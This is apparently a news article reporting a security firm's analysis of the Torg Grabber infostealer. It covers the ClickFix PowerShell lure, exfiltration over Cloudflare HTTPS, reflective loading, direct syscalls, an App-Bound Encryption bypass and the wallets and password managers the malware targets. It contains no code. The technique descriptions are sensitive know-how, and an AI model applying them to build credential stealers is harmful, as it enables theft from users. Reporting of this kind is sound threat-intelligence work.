Clarissa Hana
A new and rapidly evolving information-stealing malware, dubbed Torg Grabber, has emerged with a sophisticated arsenal designed to pilfer sensitive data from a staggering 850 browser extensions, with a significant focus on cryptocurrency wallets. Cybersecurity researchers at Gen Digital have identified over 700 of these targeted extensions as belonging to cryptocurrency wallets, indicating a deliberate and high-impact campaign against digital asset holders. The malware’s initial point of entry is a cunning technique known as ClickFix, which involves hijacking the user’s clipboard to trick them into executing a malicious PowerShell command, thereby gaining a foothold on the victim’s system.
The alarming pace of Torg Grabber’s development is a key concern for cybersecurity professionals. Gen Digital’s analysis reveals a relentless evolution, with 334 unique malware samples compiled in just three months, spanning from December 2025 to February 2026. This rapid iteration suggests a dedicated and well-resourced threat actor actively refining their tools to bypass existing defenses and maximize their illicit gains. Furthermore, the constant registration of new command-and-control (C2) servers on a weekly basis underscores the malware’s robust infrastructure and its ability to adapt to takedown efforts.
Beyond its primary focus on cryptocurrency wallets, Torg Grabber demonstrates a broad appetite for sensitive information. It actively targets data from 103 password manager extensions, two-factor authentication tools, and a further 19 note-taking applications. This comprehensive data harvesting strategy indicates a multifaceted approach to accumulating personal and financial credentials, aiming to maximize the potential for fraud and identity theft.
The Rapid Evolution of a Digital Predator
The technical report released by Gen Digital this week offers a detailed account of Torg Grabber’s developmental trajectory. Initially, the malware relied on a Telegram-based channel for its data exfiltration. This was subsequently upgraded to a custom, encrypted TCP protocol. However, in a significant shift on December 18, 2025, both of these methods were abandoned in favor of a more resilient and stealthy approach: an HTTPS connection routed through Cloudflare’s extensive infrastructure. This strategic move not only enhances the malware’s ability to evade detection but also facilitates more efficient data transfer through chunked uploads and payload delivery.
The malware is equipped with a formidable suite of anti-analysis mechanisms designed to thwart security researchers and automated detection systems. It employs multi-layered obfuscation techniques, making it exceptionally difficult to decompile and understand its inner workings. Moreover, Torg Grabber leverages direct syscalls and reflective loading. Direct syscalls allow the malware to interact directly with the operating system’s core functions, bypassing standard API calls that are often monitored by security software. Reflective loading, on the other hand, enables the malware to load its final payload entirely into memory without writing it to disk, a technique that significantly reduces its footprint and makes it harder for file-based antivirus solutions to detect.
A critical development in Torg Grabber’s evolution occurred on December 22, 2025, when it incorporated a bypass for App-Bound Encryption (ABE). ABE is a security feature implemented by major Chromium-based browsers, including Chrome, Brave, Edge, Vivaldi, and Opera, to protect cookies from being easily stolen by malicious extensions. By circumventing this protection, Torg Grabber joins a growing number of information-stealers that have successfully found ways to overcome Chrome’s latest defenses, highlighting an ongoing arms race between malware developers and browser security teams.
Adding to its sophisticated toolkit, researchers also identified a standalone tool named "Underground." This utility is specifically designed for extracting browser data. It achieves this by injects a Dynamic Link Library (DLL) reflectively into the browser process. This allows it to access Chrome’s COM Elevation Service and, crucially, extract the master encryption key used by the browser. This method of stealing the master encryption key is a technique that has also been recently observed in other high-profile infostealer malware, such as VoidStealer, indicating a shared playbook among sophisticated threat actors.
Extensive Data Theft Capabilities: Targeting the Digital Lifeline
Gen Digital’s comprehensive analysis, available on their research blog, reveals the extensive reach of Torg Grabber. The malware targets a broad spectrum of web browsers, specifically enumerating 25 Chromium-based browsers and 8 Firefox variants. Its primary objective within these browsers is to abscond with user credentials, session cookies, and autofill data – all of which are vital components for online activity and account access.
The sheer scale of Torg Grabber’s cryptocurrency wallet targeting is particularly alarming. Of the 850 browser extensions it enumerates, a staggering 728 are designed for managing digital assets. The researchers wryly observe that this list covers "essentially every crypto wallet ever conceived by human optimism," underscoring the malware’s comprehensive approach to capturing the digital wealth of its victims. Prominent names on this hit list include MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare. However, the threat is not confined to these well-known entities. Torg Grabber diligently targets lesser-known, "long tail" wallets, demonstrating a broad-brush approach to maximizing its potential victim pool, irrespective of the wallet’s popularity.
The malware’s data harvesting extends beyond digital currency. It also targets a significant list of 103 extensions dedicated to password management, token generation, and authentication. This includes widely used services such as LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server, heylogin, and various two-factor authentication apps like 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA. This broad targeting of authentication and credential management tools suggests a strategy to gain access to a wide array of online accounts, not just those related to cryptocurrency.
Furthermore, Torg Grabber exhibits capabilities that extend beyond browser-based data theft. It actively seeks information from popular communication and gaming platforms like Discord and Steam, as well as VPN applications, FTP clients, and email clients. It also targets desktop cryptocurrency wallet applications, further solidifying its position as a comprehensive digital thief.
.jpg)
The malware’s functionality is further enhanced by its ability to profile the compromised host system. It can create a hardware fingerprint, catalog installed software – including a list of 24 antivirus tools, presumably to identify potential obstacles – and capture screenshots of the user’s desktop. It also demonstrates the capacity to exfiltrate files directly from the user’s Desktop and Documents folders, potentially exposing sensitive personal and financial documents.
A notable advanced capability is Torg Grabber’s ability to execute shellcode on the compromised device. This shellcode is delivered in a ChaCha-encrypted, zlib-compressed format directly from the C2 server. This allows the threat actor to dynamically deploy new malicious functionalities or updates without requiring a full malware re-compilation, offering a high degree of flexibility and adaptability.
A Growing Threat with Expanding Operator Base
Gen Digital issues a stern warning that Torg Grabber’s rapid development is an ongoing concern. The weekly registration of new C2 domains indicates a continuous effort to maintain its operational infrastructure and evade detection. Moreover, the analysis has revealed an expanding operator base, with researchers documenting approximately 40 distinct tags associated with the malware’s activity during their investigation. This suggests that Torg Grabber is not the product of a single individual or small group but potentially a more organized and distributed criminal enterprise, making it a more persistent and widespread threat.
The implications of Torg Grabber’s capabilities are far-reaching. For individual cryptocurrency users, the risk of losing significant financial assets due to compromised wallets is exceptionally high. The ability to bypass advanced browser security features like ABE and to steal master encryption keys represents a significant advancement in the capabilities of infostealer malware. Beyond financial losses, the theft of credentials from password managers and other sensitive applications can lead to widespread account compromise, identity theft, and further financial fraud.
For organizations, the presence of such sophisticated malware on user devices can lead to data breaches, reputational damage, and significant financial costs associated with incident response and recovery. The malware’s ability to fingerprint systems and document installed software could also be leveraged for more targeted attacks or to gather intelligence for future campaigns.
The rapid evolution and expansion of Torg Grabber underscore the need for continuous vigilance and robust cybersecurity practices. Users are strongly advised to exercise extreme caution when installing browser extensions, to only download from trusted sources, and to regularly update their browsers and security software. The ongoing cat-and-mouse game between malware developers and security researchers highlights the critical importance of proactive threat intelligence and advanced detection mechanisms to stay ahead of emerging cyber threats like Torg Grabber. The expansion of its operator base suggests that this malware will likely remain a significant threat for the foreseeable future.
